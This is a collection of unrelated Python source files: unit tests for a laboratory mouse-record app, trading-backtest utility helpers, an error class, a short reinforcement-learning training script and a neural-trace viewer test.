child_keyword='small_intenstine_tumor',
adapter=self.adapter
)
# Pass requirement
# 1. Delete inserted mouse handler2
# 2. handler 2 should not exists in the list
def test_harvest_mouse_delete(self):
# Force get the new mouse list from the db
force_refresh_cache(self)
data_to_post = create_mouse_object(
handler='handler2',
physical_id='1234567B',
gender='M',
mouseline='mouseLine1',
genotype='genoType1',
birth_date=datetime.now().date(),
end_date=datetime.now().date(),
cog='True',
phenotype='phenoType1',
project_title='projectTitle1',
experiment='experiment1',
comment='comment1',
pfa_record=AdvancedRecord(
1, 1, 1, 1, 1, 1, '1'
),
freeze_record=Record(
1, 1, '1'
)
)
# Make the request and check for the status code
# Insert handler 2 mouse into db
make_request_and_check(
test_cases=self,
data=data_to_post,
url='/harvestedmouse/insert',
request_object=self.factory.post,
expected_status_code=201,
view_class=harvested_mouse_insertion,
viewer=self.viewer
)
# Check handler 2 is inserted into db
# by retrieving entire mouse entries
# The remaining should be 0
check_model_view_objects(
test_cases=self,
view_list_class=harvested_mouse_list,
view_url='/harvestedmouse/force_list',
expect_num_of_return=2,
list_to_matched=['handler1', 'handler2'],
expect_num_of_remain=0,
keyword='handler',
adapter=self.adapter
)
# Make request to delete the handler 2 mouse
# Make the request and check for the status code
make_request_and_check(
test_cases=self,
data=data_to_post,
url='/harvestedmouse/delete',
request_object=self.factory.delete,
expected_status_code=200,
view_class=harvested_mouse_delete,
viewer=self.viewer
)
# After deleted handler2 mouse
# only handler1 remained
# The remaining should be 0
check_model_view_objects(
test_cases=self,
view_list_class=harvested_mouse_list,
view_url='/harvestedmouse/force_list',
expect_num_of_return=1,
list_to_matched=['handler1'],
expect_num_of_remain=0,
keyword='handler',
adapter=self.adapter
)
# Pass requirement
# 1. Delete inserted mouse handler2
# 2. handler 2 should not exists in the list
def test_advanced_harvest_mouse_multiple_delete(self):
# Force get the new mouse list from the db
force_refresh_cache(self)
data_to_post_2 = create_mouse_object(
handler='handler2',
physical_id='1234567B',
gender='M',
mouseline='mouseLine1',
genotype='genoType1',
birth_date=datetime.now().date(),
end_date=datetime.now().date(),
cog='True',
phenotype='phenoType1',
project_title='projectTitle1',
experiment='experiment1',
comment='comment1',
pfa_record=AdvancedRecord(
1, 1, 1, 1, 1, 1, '1'
),
freeze_record=Record(
1, 1, '1'
)
)
# Make the request and check for the status code
# Insert handler 2 mouse into db
make_request_and_check(
test_cases=self,
data=data_to_post_2,
url='/harvestedmouse/insert',
request_object=self.factory.post,
expected_status_code=201,
view_class=harvested_mouse_insertion,
viewer=self.viewer
)
data_to_post_3 = create_mouse_object(
handler='handler3',
physical_id='1234567C',
gender='M',
mouseline='mouseLine1',
genotype='genoType1',
birth_date=datetime.now().date(),
end_date=datetime.now().date(),
cog='True',
phenotype='phenoType1',
project_title='projectTitle1',
experiment='experiment1',
comment='comment1',
pfa_record=AdvancedRecord(
1, 1, 1, 1, 1, 1, '1'
),
freeze_record=Record(
1, 1, '1'
)
)
# Make the request and check for the status code
# Insert handler 2 mouse into db
make_request_and_check(
test_cases=self,
data=data_to_post_3,
url='/harvestedmouse/insert',
request_object=self.factory.post,
expected_status_code=201,
view_class=harvested_mouse_insertion,
viewer=self.viewer
)
# After inserted 2 mice
# there will be 3 mouses handler1,handler2 and handler3
# The remaining should be 0
check_model_view_objects(
test_cases=self,
view_list_class=harvested_mouse_list,
view_url='/harvestedmouse/force_list',
expect_num_of_return=3,
list_to_matched=['handler1', 'handler2', 'handler3'],
expect_num_of_remain=0,
keyword='handler',
adapter=self.adapter
)
mouse_list = MouseList()
mouse_list.add_mouse([data_to_post_2, data_to_post_3])
# Delete handler 2 and handler 3
# Make request to delete the handler 2 mouse
# Make the request and check for the status code
make_request_and_check(
test_cases=self,
data=mouse_list,
url='/harvestedmouse/delete',
request_object=self.factory.delete,
expected_status_code=200,
view_class=harvested_mouse_delete,
viewer=self.viewer
)
# After deleted handler2 and handler 3mouse
# only handler1 remained
# The remaining should be 0
check_model_view_objects(
test_cases=self,
view_list_class=harvested_mouse_list,
view_url='/harvestedmouse/force_list',
expect_num_of_return=1,
list_to_matched=['handler1'],
expect_num_of_remain=0,
keyword='handler',
adapter=self.adapter
)
'''
MVC Test
'''
def str_time_prop(start, end, format_input, prop):
"""Get a time at a proportion of a range of two formatted times.
start and end should be strings specifying times formated in the
given format (strftime-style), giving an interval [start, end].
prop specifies how a proportion of the interval to be taken after
start. The returned time will be in the specified format.
"""
stime = time.mktime(time.strptime(start, format_input))
etime = time.mktime(time.strptime(end, format_input))
ptime = stime + prop * (etime - stime)
return time.strftime(format_input, time.localtime(ptime))
def random_date(start, end, prop):
return str_time_prop(start, end, '%Y-%m-%d', prop)
def random_boolean():
return random.choice([True, False])
def get_random_string(length):
letters = string.ascii_lowercase
result_str = ''.join(random.choice(letters) for i in range(length))
return result_str
def get_random_gender():
return random.choice(['Male', 'Female'])
def get_random_hanlder():
return random.choice(['Shih Han', 'Alex', 'Hui San', 'David', 'Mark'])
##############################################################################################################
# Unit Test name: Model Model test case
# Target: Mouse, MouseList
# Description:
# 1. Populate information into Mouse, retrieve the same information from the mouse
# 2. Testing basic manipulation of MouseList
##############################################################################################################
class ModelTestCase(TestCase):
# Setup function, insert required objects into the database
def setUp(self) -> None:
self.physical_id = get_random_string(8)
self.handler = get_random_hanlder()
self.gender = get_random_gender()
self.mouseline = get_random_string(8)
self.genotype = get_random_string(8)
self.birth_date = random_date("2008-1-1", "2009-1-1", random.random())
self.end_date = random_date("2008-1-1", "2009-1-1", random.random())
self.cog = str(random_boolean())
self.phenotype = get_random_string(8)
self.project_title = get_random_string(6)
self.experiment = get_random_string(6)
self.comment = get_random_string(30)
self.sample_mouse = Mouse(physical_id=self.physical_id,
handler=self.handler,
gender=self.gender,
mouseline=self.mouseline,
genotype=self.genotype,
birth_date=self.birth_date,
end_date=self.end_date,
cog=self.cog,
phenotype=self.phenotype,
project_title=self.project_title,
experiment=self.experiment,
comment=self.comment)
# Pass requirement
# 1. Checl the inforamtion created and populated is the same
def test_model_mouse(self):
if not (self.sample_mouse.physical_id == self.physical_id and
self.sample_mouse.handler == self.handler and
self.sample_mouse.genotype == self.genotype):
self.assertTrue(False)
# Pass requirement
# 1. Check if the mouse can be retrived correctly
def test_model_mouse_list_add_retrieve(self):
self.check_moust_list = []
self.mouselist = MouseList()
for i in range(1, 10):
m = Mouse(physical_id=get_random_string(8),
handler=self.handler,
gender=self.gender,
mouseline=self.mouseline,
genotype=self.genotype,
birth_date=self.birth_date,
end_date=self.end_date,
cog=self.cog,
phenotype=self.phenotype,
project_title=self.project_title,
experiment=self.experiment,
comment=self.comment)
self.check_moust_list.append(m)
self.mouselist.add_mouse(m)
for m in self.check_moust_list:
self.mouselist.remove_mouse(m)
if self.mouselist.get_size() != 0:
self.assertTrue(False)
self.check_moust_list = []
self.mouselist = MouseList()
# Using different mouse but with same id, different ref
for i in range(1, 10):
m = Mouse(physical_id=get_random_string(8),
handler=self.handler,
gender=self.gender,
mouseline=self.mouseline,
genotype=self.genotype,
birth_date=self.birth_date,
end_date=self.end_date,
cog=self.cog,
phenotype=self.phenotype,
project_title=self.project_title,
experiment=self.experiment,
comment=self.comment)
self.check_moust_list.append(m)
self.mouselist.add_mouse(copy.deepcopy(m))
for m in self.check_moust_list:
self.mouselist.remove_mouse(m)
if self.mouselist.get_size() != 0:
self.assertTrue(False)
# Pass requirement
# 1. Check if the mouse list can be retrived correctly
def test_model_mouse_List_equality_matched(self):
self.check_moust_list = []
self.mouselist = MouseList()
self.sample_mouse_list = MouseList()
for i in range(1, 10):
m = Mouse(physical_id=get_random_string(8),
handler=self.handler,
gender=self.gender,
mouseline=self.mouseline,
genotype=self.genotype,
birth_date=self.birth_date,
end_date=self.end_date,
cog=self.cog,
phenotype=self.phenotype,
project_title=self.project_title,
experiment=self.experiment,
comment=self.comment)
self.check_moust_list.append(m)
self.mouselist.add_mouse(m)
self.sample_mouse_list.add_mouse(m)
if not (self.mouselist == self.sample_mouse_list):
self.assertTrue(False)
# Clear everything
self.mouselist.clear()
self.sample_mouse_list.clear()
for i in range(1, 10):
physical_id = get_random_string(8)
m = Mouse(physical_id=physical_id,
handler=self.handler,
gender=self.gender,
mouseline=self.mouseline,
genotype=self.genotype,
birth_date=self.birth_date,
end_date=self.end_date,
cog=self.cog,
phenotype=self.phenotype,
project_title=self.project_title,
experiment=self.experiment,
comment=self.comment)
m2 = Mouse(physical_id=physical_id[::-1],
handler=self.handler,
gender=self.gender,
mouseline=self.mouseline,
genotype=self.genotype,
birth_date=self.birth_date,
end_date=self.end_date,
cog=self.cog,
phenotype=self.phenotype,
project_title=self.project_title,
experiment=self.experiment,
comment=self.comment)
self.mouselist.add_mouse(m)
self.sample_mouse_list.add_mouse(m2)
if self.mouselist == self.sample_mouse_list:
self.assertTrue(False)
# Pass requirement
# 1. Check if the mouse list can be retrived correctly
def test_model_mouse_List_update_matched(self):
# Tested with modifying handler with same ref
self.mouselist = MouseList()
self.mouselist.add_mouse(self.sample_mouse)
self.sample_mouse.handler = 'ABC'
self.mouselist.update_mouse(self.sample_mouse)
mouse = self.mouselist.get_mouse_by_id(self.sample_mouse.physical_id)
if not(mouse.handler == 'ABC'):
self.assertTrue(False)
# Tested with different reference address
# Creating a diff address of the mouse with different handler
# but with same physical id
m2 = Mouse(physical_id=self.physical_id,
handler='CBA',
gender=self.gender,
mouseline=self.mouseline,
genotype=self.genotype,
birth_date=self.birth_date,
end_date=self.end_date,
cog=self.cog,
phenotype=self.phenotype,
project_title=self.project_title,
experiment=self.experiment,
comment=self.comment)
self.mouselist.update_mouse(m2)
mouse = self.mouselist.get_mouse_by_id(self.sample_mouse.physical_id)
if not(mouse.handler == 'CBA'):
self.assertTrue(False)
##############################################################################################################
# Unit Test name: Model Adapter test case
# Target: Mouse, MouseList
# Description:
# 1. Populated a predefined mouse list
# 2. make sure the converted information in the xml file matched with the predefined mouse list
##############################################################################################################
class ModelAdapterTestCase(TestCase):
# Setup function, insert required objects into the database
def setUp(self) -> None:
self.physical_id = 'abc'
self.handler = 'Shih Han'
self.gender = 'Male'
self.mouseline = 'mouseline1'
self.genotype = 'genotype1'
self.birth_date = '2020-06-11'
self.end_date = '2020-05-21'
self.cog = '1'
self.phenotype = 'Phenotyp1'
self.project_title = 'abc'
self.experiment = 'exprement1'
self.comment = 'comment1'
self.sample_mouse_1 = Mouse(physical_id=self.physical_id,
handler=self.handler,
gender=self.gender,
mouseline=self.mouseline,
genotype=self.genotype,
birth_date=self.birth_date,
end_date=self.end_date,
cog=self.cog,
phenotype=self.phenotype,
project_title=self.project_title,
experiment=self.experiment,
comment=self.comment)
self.sample_mouse_2 = Mouse(physical_id=self.physical_id[::-1],
handler=self.handler,
gender=self.gender,
mouseline=self.mouseline,
genotype=self.genotype,
birth_date=self.birth_date,
end_date=self.end_date,
cog=self.cog,
phenotype=self.phenotype,
project_title=self.project_title,
experiment=self.experiment,
comment=self.comment)
self.mouse_list = MouseList()
self.mouse_list.add_mouse([self.sample_mouse_1, self.sample_mouse_2])
self.adapter = XmlModelAdapter()
# Pass requirement
# 1. Check if the mouse can be retrived correctly
def test_model_mouse_matched(self):
# open xml file
with open('harvestmouseapp/mvc_model/sample/singlemouse.xml') as r_open:
xml_raw_data = r_open.read()
# transform the data into mouse object
converted = self.adapter.transform(xml_raw_data)
if not (self.sample_mouse_1.physical_id == converted.physical_id and
self.sample_mouse_1.handler == converted.handler and
self.sample_mouse_1.genotype == converted.genotype):
self.assertTrue(False)
# Pass requirement
# 1. Check if the mouse list can be retrived correctly
def test_model_mouse_List_matched(self):
# open xml file
with open('harvestmouseapp/mvc_model/sample/groupmouse.xml') as r_open:
xml_raw_data = r_open.read()
# transform the data into mouse object
converted_list = self.adapter.transform(xml_raw_data)
for m in converted_list:
if self.mouse_list.is_mouse_in_list(physical_id=m.physical_id):
# Compare with the first mouse
if self.sample_mouse_1.physical_id == m.physical_id:
if not (self.sample_mouse_1.physical_id == m.physical_id and
self.sample_mouse_1.handler == m.handler and
self.sample_mouse_1.genotype == m.genotype):
self.assertTrue(False)
# Compare with the second mouse
elif self.sample_mouse_2.physical_id == m.physical_id:
if not (self.sample_mouse_2.physical_id == m.physical_id and
self.sample_mouse_2.handler == m.handler and
self.sample_mouse_2.genotype == m.genotype):
self.assertTrue(False)
else:
# nothing has matched, asserted
self.assertTrue(False)
# Remove the mouse from the mouse list regardless
# of the reference, compare the id only
self.mouse_list.remove_mouse(m)
else:
# nothing in the current mouse list, asserted
self.assertTrue(False)
# must be 0 if everything matched perfectly
if not (len(self.mouse_list) == 0):
self.assertTrue(False)
##############################################################################################################
# Unit Test name: Model Adapter test case
# Target: Mouse, MouseList
# Description:
# 1. Populated a predefined mouse list
# 2. make sure the converted information in the xml file matched with the predefined mouse list
# 3. Check if the xml parser and object xml serilizer can work perfectly
##############################################################################################################
class ModelViewerTestCase(TestCase):
# Setup function, insert required objects into the database
def setUp(self) -> None:
self.physical_id = 'abc'
self.handler = 'Shih Han'
self.gender = 'Male'
self.mouseline = 'mouseline1'
self.genotype = 'genotype1'
self.birth_date = '2020-06-11'
self.end_date = '2020-05-21'
self.cog = '1'
self.phenotype = 'Phenotyp1'
self.project_title = 'abc'
self.experiment = 'exprement1'
self.comment = 'comment1'
self.sample_mouse_1 = Mouse(physical_id=self.physical_id,
handler=self.handler,
gender=self.gender,
mouseline=self.mouseline,
genotype=self.genotype,
birth_date=self.birth_date,
end_date=self.end_date,
cog=self.cog,
phenotype=self.phenotype,
project_title=self.project_title,
experiment=self.experiment,
comment=self.comment)
self.sample_mouse_2 = Mouse(physical_id=self.physical_id[::-1],
handler=self.handler,
gender=self.gender,
mouseline=self.mouseline,
genotype=self.genotype,
birth_date=self.birth_date,
end_date=self.end_date,
cog=self.cog,
phenotype=self.phenotype,
project_title=self.project_title,
experiment=self.experiment,
comment=self.comment)
self.mouse_list = MouseList()
self.mouse_list.add_mouse([self.sample_mouse_1, self.sample_mouse_2])
self.adapter = XmlModelAdapter()
self.viewer = XmlMouseViewer()
# Pass requirement
# 1. Check if the mouse can be retrived correctly
def test_viewer_mouse_matched(self):
# open xml file
# Convert mouse sample to xml and save it
xml_data = self.viewer.transform(self.sample_mouse_1)
with open('testing.xml', 'w') as w_open:
w_open.write(xml_data)
with open('testing.xml') as r_open:
xml_raw_data = r_open.read()
# transform the data into mouse object
converted = self.adapter.transform(xml_raw_data)
if not (self.sample_mouse_1.physical_id == converted.physical_id and
self.sample_mouse_1.handler == converted.handler and
self.sample_mouse_1.genotype == converted.genotype):
self.assertTrue(False)
os.remove('testing.xml')
# Pass requirement
# 1. Check if the mouse can be retrived correctly
def test_viewer_mouse_list_matched(self):
# open xml file
# Convert mouse sample to xml and save it
xml_data = self.viewer.transform(self.mouse_list)
with open('testing.xml', 'w') as w_open:
w_open.write(xml_data)
with open('testing.xml') as r_open:
xml_raw_data = r_open.read()
# transform the data into mouse object
converted_list = self.adapter.transform(xml_raw_data)
for m in converted_list:
if self.mouse_list.is_mouse_in_list(physical_id=m.physical_id):
# Compare with the first mouse
if self.sample_mouse_1.physical_id == m.physical_id:
if not (self.sample_mouse_1.physical_id == m.physical_id and
self.sample_mouse_1.handler == m.handler and
self.sample_mouse_1.genotype == m.genotype):
self.assertTrue(False)
# Compare with the second mouse
elif self.sample_mouse_2.physical_id == m.physical_id:
if not (self.sample_mouse_2.physical_id == m.physical_id and
self.sample_mouse_2.handler == m.handler and
self.sample_mouse_2.genotype == m.genotype):
self.assertTrue(False)
else:
# nothing has matched, asserted
self.assertTrue(False)
# Remove the mouse from the mouse list regardless
# of the reference, compare the id only
self.mouse_list.remove_mouse(m)
else:
# nothing in the current mouse list, asserted
self.assertTrue(False)
# must be 0 if everything matched perfectly
if not (len(self.mouse_list) == 0):
self.assertTrue(False)
os.remove('testing.xml')
##############################################################################################################
# Unit Test name: SQLlite Database test case
# Target: Mouse, MouseList
# Description:
# 1. Validation of Create, Update, Read and Delete of the mouse databse
##############################################################################################################
class SqliteDatabaserTestCase(TestCase):
def setUp(self) -> None:
self.physical_id = 'abc'
self.handler = 'Shih Han'
self.gender = 'Male'
self.mouseline = 'mouseline1'
self.genotype = 'genotype1'
self.birth_date = '2020-06-11'
self.end_date = '2020-05-21'
self.cog = '1'
self.phenotype = 'Phenotyp1'
self.project_title = 'abc'
self.experiment = 'exprement1'
self.comment = 'comment1'
self.sample_mouse_1 = Mouse(physical_id=self.physical_id,
handler=self.handler,
gender=self.gender,
mouseline=self.mouseline,
genotype=self.genotype,
birth_date=self.birth_date,
end_date=self.end_date,
cog=self.cog,
phenotype=self.phenotype,
project_title=self.project_title,
experiment=self.experiment,
comment=self.comment)
self.sample_mouse_2 = Mouse(physical_id=self.physical_id[::-1],
handler=self.handler,
gender=self.gender,
mouseline=self.mouseline,
genotype=self.genotype,
birth_date=self.birth_date,
end_date=self.end_date,
cog=self.cog,
phenotype=self.phenotype,
project_title=self.project_title,
experiment=self.experiment,
comment=self.comment)
self.mouse_list = MouseList()
self.mouse_list.add_mouse([self.sample_mouse_1, self.sample_mouse_2])
self.db_adapter = GenericSqliteConnector()
self.adapter = XmlModelAdapter()
self.viewer = XmlMouseViewer()
self.db_adapter.create_mouse(self.mouse_list)
# Pass requirement
# 1. Check if the mouse can be retrived correctly from the databse
def test_get_mouse_list_from_db(self):
mouse_output = self.db_adapter.get_all_mouse()
if not (mouse_output == self.mouse_list):
self.assertTrue(False)
# Pass requirement
# 1. Check if the mouse can be retrived correctly from the databse
def test_create_list_into_db(self):
self.sample_mouse_3 = Mouse(physical_id=self.physical_id + '1',
handler=self.handler,
gender=self.gender,
mouseline=self.mouseline,
genotype=self.genotype,
birth_date=self.birth_date,
end_date=self.end_date,
cog=self.cog,
phenotype=self.phenotype,
project_title=self.project_title,
experiment=self.experiment,
comment=self.comment)
self.sample_mouse_4 = Mouse(physical_id=self.physical_id[::-1] + '3',
handler=self.handler,
gender=self.gender,
mouseline=self.mouseline,
genotype=self.genotype,
birth_date=self.birth_date,
end_date=self.end_date,
cog=self.cog,
phenotype=self.phenotype,
project_title=self.project_title,
experiment=self.experiment,
comment=self.comment)
self.mouse_list.add_mouse([self.sample_mouse_3, self.sample_mouse_4])
try:
self.db_adapter.create_mouse(self.mouse_list)
except DuplicationMouseError as e:
print(e.message)
mouse_output = self.db_adapter.get_all_mouse()
if not (mouse_output == self.mouse_list):
self.assertTrue(False)
# cache integrity check
mouse_output = self.db_adapter.get_all_mouse()
if not (mouse_output == self.mouse_list):
self.assertTrue(False)
def test_update_mouse_list(self):
# Force to get a new mouse list
mouse_list_before = copy.deepcopy(self.db_adapter.get_all_mouse())
self.sample_mouse_2_copy = copy.deepcopy(self.sample_mouse_2)
self.sample_mouse_2_copy.handler = 'CBA'
self.db_adapter.update_mouse(self.sample_mouse_2_copy)
# Force to get a new mouse list
mouse_list = self.db_adapter.get_all_mouse()
mouse = mouse_list.get_mouse_by_id(self.sample_mouse_2_copy.physical_id)
if not mouse.handler == 'CBA':
self.assertTrue(False)
if mouse_list_before == mouse_list:
self.assertTrue(False)
def test_update_mouse_list_list(self):
# Force to get a new mouse list
mouse_list_before = copy.deepcopy(self.db_adapter.get_all_mouse())
self.sample_mouse_1_copy = copy.deepcopy(self.sample_mouse_1)
self.sample_mouse_1_copy.handler = 'ABC'
self.sample_mouse_2_copy = copy.deepcopy(self.sample_mouse_2)
self.sample_mouse_2_copy.handler = 'CBA'
updating_mouse_list = MouseList()
updating_mouse_list.add_mouse([self.sample_mouse_1_copy, self.sample_mouse_2_copy])
self.db_adapter.update_mouse(updating_mouse_list)
# Force to get a new mouse list
mouse_list = self.db_adapter.get_all_mouse()
mouse = mouse_list.get_mouse_by_id(self.sample_mouse_1_copy.physical_id)
if not mouse.handler == 'ABC':
self.assertTrue(False)
mouse = mouse_list.get_mouse_by_id(self.sample_mouse_2_copy.physical_id)
if not mouse.handler == 'CBA':
self.assertTrue(False)
if mouse_list_before == mouse_list:
self.assertTrue(False)
def test_update_mouse_list_delete(self):
self.db_adapter.delete_mouse(self.sample_mouse_1)
self.db_adapter.delete_mouse(self.sample_mouse_2)
mouselist = self.db_adapter.get_all_mouse()
if not(mouselist.get_size() == 0):
self.assertTrue(False)
mouselist = self.db_adapter.get_all_mouse()
if not(mouselist.get_size() == 0):
self.assertTrue(False)
def test_update_mouse_list_delete_list(self):
to_be_deleted = MouseList()
to_be_deleted.add_mouse([self.sample_mouse_1, self.sample_mouse_2])
self.db_adapter.delete_mouse(to_be_deleted)
mouselist = self.db_adapter.get_all_mouse()
if not(mouselist.get_size() == 0):
self.assertTrue(False)
mouselist = self.db_adapter.get_all_mouse()
if not(mouselist.get_size() == 0):
self.assertTrue(False)
def test_update_mouse_list_delete_particular_check(self):
self.db_adapter.delete_mouse(self.sample_mouse_2)
mouselist = self.db_adapter.get_all_mouse()
if not(mouselist.get_size() == 1):
self.assertTrue(False)
mouse = mouselist.get_mouse_by_id(self.sample_mouse_1.physical_id)
if mouse is None:
self.assertTrue(False)
mouse = mouselist.get_mouse_by_id(self.sample_mouse_2.physical_id)
if mouse is not None:
self.assertTrue(False)
mouselist = self.db_adapter.get_all_mouse()
if not(mouselist.get_size() == 1):
self.assertTrue(False)
mouse = mouselist.get_mouse_by_id(self.sample_mouse_1.physical_id)
if mouse is None:
self.assertTrue(False)
mouse = mouselist.get_mouse_by_id(self.sample_mouse_2.physical_id)
if mouse is not None:
self.assertTrue(False)
##############################################################################################################
# Unit Test name: Moues Filter class test case
# Target: Mouse, MouseList
# Description:
# 1. Validation of filter functionality on the mouse list model
##############################################################################################################
class MouseFilterTestCase(TestCase):
def setUp(self) -> None:
self.physical_id = 'abc'
self.handler = 'Shih Han'
self.gender = 'Male'
self.mouseline = 'mouseline1'
self.genotype = 'genotype1'
self.birth_date = '2020-06-11'
self.end_date = '2020-05-21'
self.cog = '1'
self.phenotype = 'Phenotyp1'
self.project_title = 'abc'
self.experiment = 'exprement1'
self.comment = 'comment1'
self.sample_mouse_1 = Mouse(physical_id=self.physical_id,
handler=self.handler,
gender=self.gender,
mouseline=self.mouseline,
genotype=self.genotype,
birth_date=self.birth_date,
end_date=self.end_date,
cog=self.cog,
phenotype=self.phenotype,
project_title=self.project_title,
experiment=self.experiment,
comment=self.comment)
self.sample_mouse_2 = Mouse(physical_id=self.physical_id[::-1],
handler=self.handler,
gender=self.gender,
mouseline=self.mouseline,
genotype=self.genotype,
birth_date=self.birth_date,
end_date=self.end_date,
cog=self.cog,
phenotype=self.phenotype,
project_title=self.project_title,
experiment=self.experiment,
comment=self.comment)
self.mouse_list = MouseList()
self.mouse_list.add_mouse([self.sample_mouse_1, self.sample_mouse_2])
self.filter = MouseFilter()
def test_simple_mouse_filter_case(self):
# Current mouse list contains mouse with physical_id of 'abc' and 'cba'
# Test case 1
# Retrieve only abc, filter physical_id by value of 'ab'
mouse_list = self.filter.filter(
self.mouse_list,
FilterOption(
column_name='physical_id',
value='ab'
))
if len(mouse_list) != 1:
self.assertTrue(False)
if mouse_list.get_mouse_by_id('abc') is None:
self.assertTrue(False)
|
import datetime
import os
from pathlib import Path
from shutil import copyfile
from typing import Dict, Any
import pandas as pd
import pytz
import unicodedata
import re
def slugify(value, allow_unicode=False):
"""
Taken from https://github.com/django/django/blob/master/django/utils/text.py
Convert to ASCII if 'allow_unicode' is False. Convert spaces or repeated
dashes to single dashes. Remove characters that aren't alphanumerics,
underscores, or hyphens. Convert to lowercase. Also strip leading and
trailing whitespace, dashes, and underscores.
"""
value = str(value)
if allow_unicode:
value = unicodedata.normalize('NFKC', value)
else:
value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore').decode('ascii')
value = re.sub(r'[^\w\s-]', '', value.lower())
return re.sub(r'[-\s]+', '-', value).strip('-_')
def get_history_dir(config: Dict[str, Any]) -> Path:
"""
Return the directory where all the runs are stored.
:param config: config file
:return: path to folder
"""
folder = config["history_data_dir"]
return folder
def get_run_history_dir(config: Dict[str, Any], run_id: str) -> Path:
"""
Return the directory where the current run is stored.
:param config: config file
:param run_id: run id
:return: path to folder
"""
folder = Path(get_history_dir(config), run_id)
return folder
def copy_file_to_folder(file_path: Path, folder_path: Path) -> None:
"""
Copy file to folder and keep same name.
:param file_path: path to file
:param folder_path: path to folder
:return: None
"""
copyfile(file_path, os.path.join(folder_path, os.path.basename(file_path)))
def parse_datetime_string(datetime_string: str) -> datetime.datetime:
"""
Parse datetime in "31.01.2021 00:00:00" format.
:param datetime_string: string representation
:return: datetime object
"""
if " " in datetime_string:
return datetime.datetime.strptime(datetime_string, '%d.%m.%Y %H:%M:%S').replace(tzinfo=pytz.utc)
else:
return datetime.datetime.strptime(datetime_string, '%d.%m.%Y').replace(tzinfo=pytz.utc)
def sanitize_pair(pair: str) -> str:
"""
Remove seperation symbols from pair string.
:param pair: pair name (BTC/USDT)
:return: pair without seperation symbols (BTCUSDT)
"""
return pair.replace("/", "").replace("\\", "").replace("-", "").replace("_", "")
def timeframe_int_to_str(timeframe: int) -> str:
"""
Convert timeframe from integer to string
:param timeframe: minutes per candle (240)
:return: string representation for API (4h)
"""
if timeframe < 60:
return f"{timeframe}m"
elif timeframe < 1440:
return f"{int(timeframe / 60)}h"
else:
return f"{int(timeframe / 1440)}d"
def timeframe_str_to_int(timeframe: str) -> int:
"""
Convert timeframe from string to integer
:param timeframe: string representation from API (4h)
:return: minutes per candle (240)
"""
if "m" in timeframe:
return int(timeframe.replace("m", ""))
elif "h" in timeframe:
return int(timeframe.replace("h", "")) * 60
elif "d" in timeframe:
return int(timeframe.replace("d", "")) * 1440
else:
raise Exception("Unsupported timeframe")
def unix_to_pdts(unix: int) -> pd.Timestamp:
"""
Convert unix timestamp (seconds) to pandas timestamp
"""
return pd.Timestamp(unix, unit='s', tz='UTC')
def pydt_to_pdts(pydt: datetime.datetime) -> pd.Timestamp:
"""
Covert python datetime to pandas timestamp
"""
return pd.Timestamp(pydt, unit='s', tz='UTC')
def pdts_to_pydt(pdts: pd.Timestamp) -> datetime.datetime:
"""
Convert pandas timestamp to python datetime.
"""
return pdts.to_pydatetime()
def create_missing_columns(db_path: Path, table: str, df: pd.DataFrame) -> None:
"""
Add columns of dataframe to table in database.
:param db_path: path to sqlite db
:param table: table name
:param df: pandas dataframe
"""
from kektrade.database.types import get_engine
engine = get_engine(db_path)
with engine.connect() as con:
for column in list(df.columns):
try:
statement = f"alter table {table} add column {column}"
con.execute(statement)
except:
pass |
from establishment.errors.errors import ErrorList
from establishment.errors.models import get_error
class SocialAccountError(ErrorList):
GENERIC_INVALID_PROCESS = get_error(message="Invalid login process")
INVALID_SOCIAL_TOKEN = get_error(message="Invalid social token")
INVALID_SOCIAL_ACCOUNT = get_error(message="Error accessing external account (Facebook/Google/etc.)")
SOCIAL_ACCOUNT_NO_EMAIL = get_error(message="Your external account (Facebook/Google/etc.) is not linked to an email address."
"We require an email address to log you in.")
|
#reticulate::use_virtualenv("venv")
#reticulate::repl_python()
import gym
import gym_fishing
from stable_baselines3 import SAC
env = gym.make("fishing-v4")
model = SAC("MlpPolicy", env, verbose=0)
model.learn(total_timesteps=10000)
model.save("fishing-v4-SAC-Michael")
|
# -*- coding: utf-8 -*-
"""Test views."""
#------------------------------------------------------------------------------
# Imports
#------------------------------------------------------------------------------
import numpy as np
from numpy.testing import assert_allclose as ac
from vispy.util import keys
from phy.gui import GUI
from phy.io.mock import (artificial_traces,
artificial_spike_clusters,
)
from phy.utils import Bunch
from phy.utils._color import ColorSelector
from ..trace import TraceView, select_traces, _iter_spike_waveforms
#------------------------------------------------------------------------------
# Test trace view
#------------------------------------------------------------------------------
def test_trace_view(tempdir, qtbot):
nc = 5
ns = 9
sr = 1000.
ch = list(range(nc))
duration = 1.
st = np.linspace(0.1, .9, ns)
sc = artificial_spike_clusters(ns, nc)
traces = 10 * artificial_traces(int(round(duration * sr)), nc)
cs = ColorSelector()
m = Bunch(spike_times=st, spike_clusters=sc, sample_rate=sr)
s = Bunch(cluster_meta={}, selected=[0])
sw = _iter_spike_waveforms(interval=[0., 1.],
traces_interval=traces,
model=m,
supervisor=s,
n_samples_waveforms=ns,
get_best_channels=lambda cluster_id: ch,
color_selector=cs,
)
assert len(list(sw))
def get_traces(interval):
out = Bunch(data=select_traces(traces, interval, sample_rate=sr),
color=(.75,) * 4,
)
a, b = st.searchsorted(interval)
out.waveforms = []
k = 20
for i in range(a, b):
t = st[i]
c = sc[i]
s = int(round(t * sr))
d = Bunch(data=traces[s - k:s + k, :],
start_time=t - k / sr,
color=cs.get(c),
channel_ids=np.arange(5),
spike_id=i,
spike_cluster=c,
)
out.waveforms.append(d)
return out
v = TraceView(traces=get_traces,
n_channels=nc,
sample_rate=sr,
duration=duration,
channel_vertical_order=np.arange(nc)[::-1],
)
gui = GUI(config_dir=tempdir)
gui.show()
v.attach(gui)
qtbot.addWidget(gui)
# qtbot.waitForWindowShown(gui)
v.on_select([])
v.on_select([0])
v.on_select([0, 2, 3])
v.on_select([0, 2])
# ac(v.stacked.box_size, (1., .08181), atol=1e-3)
v.set_interval((.375, .625))
assert v.time == .5
v.go_to(.25)
assert v.time == .25
v.go_to(-.5)
assert v.time == .125
v.go_left()
assert v.time == .125
v.go_right()
assert v.time == .175
# Change interval size.
v.interval = (.25, .75)
ac(v.interval, (.25, .75))
v.widen()
ac(v.interval, (.125, .875))
v.narrow()
ac(v.interval, (.25, .75))
# Widen the max interval.
v.set_interval((0, duration))
v.widen()
v.toggle_show_labels()
# v.toggle_show_labels()
v.go_right()
assert v.do_show_labels
# Change channel scaling.
bs = v.stacked.box_size
v.increase()
v.decrease()
ac(v.stacked.box_size, bs, atol=1e-3)
v.origin = 'upper'
assert v.origin == 'upper'
# Simulate spike selection.
_clicked = []
